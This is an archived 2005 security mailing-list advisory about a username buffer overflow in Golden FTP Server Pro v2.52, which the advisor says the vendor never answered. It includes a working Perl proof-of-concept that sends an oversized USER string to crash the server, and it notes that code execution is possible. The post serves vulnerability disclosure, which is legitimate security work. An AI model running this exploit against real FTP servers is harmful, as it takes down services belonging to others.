lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <80115b690504271016618d0c4d@mail.gmail.com> Date: Wed, 27 Apr 2005 10:16:44 -0700 From: Reed Arvin <reedarvin@...il.com> To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk, vuln@...unia.com, news@...uriteam.com Subject: Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005) Summary: Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005) (http://www.goldenftpserver.com/) Details: Passing an overly long username parameter to the FTP server causes the EIP register to be overwritten after the USER/PASS login sequence is completed. Once this has been done the FTP will either crash or execute code (depending on the value of the username) when the server statistics are viewed by an administrator. Vulnerable Versions: Golden FTP Server Pro v2.52 (10.04.2005) Patches/Workarounds: The vendor was notified of the issue. There was no response. Exploit: Run the following PERL script against the server. Afterward, right click on the Golden FTP Server Pro icon in the Windows tray and click Statistic. The process will die. #===== Start GoldenFTPServer_Overflow.pl ===== # # Usage: GoldenFTPServer_Overflow.pl <ip> # GoldenFTPServer_Overflow.pl 127.0.0.1 # # KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005) # # Download: # http://www.goldenftpserver.com/ # ############################################################## use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Attempting to kill Golden FTP Server at $ARGV[0]:21..."; sleep(1); print $socket "USER " . "A" x 332 . "BBBB\r\n"; sleep(1); print $socket "PASS " . "\r\n"; close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } #===== End GoldenFTPServer_Overflow.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists